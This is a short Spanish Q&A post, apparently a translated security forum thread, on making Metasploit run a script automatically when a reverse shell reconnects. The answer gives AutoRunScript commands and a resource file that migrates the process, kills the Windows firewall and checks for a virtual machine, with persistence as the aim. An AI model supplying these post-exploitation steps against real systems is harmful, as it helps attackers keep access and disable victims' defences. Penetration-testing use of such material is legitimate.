¿Es posible descartar automáticamente una secuencia de comandos Metasploit cuando una conexión TCP Reverse Shell se conecta nuevamente al controlador?
por ejemplo Reverse-Shell se conecta nuevamente, inicia automáticamente un script que hará que la conexión sea persistente.
Sí. Puedes hacerlo usando la función AutoRunScript.
set AutoRunScript multi_console_command -rc /root/commands.rc
Donde /root/commands.rc contiene los comandos que ejecutas.
Por ejemplo
run post/windows/manage/migrate
run post/windows/manage/killfw
run post/windows/gather/checkvm
Desde este punto, sería trivial ganar persistencia.
Para obtener más información, consulte estos recursos:
Ejecución automática del módulo Metasploit en el recibo de ¿shell?
Lea otras preguntas en las etiquetas metasploit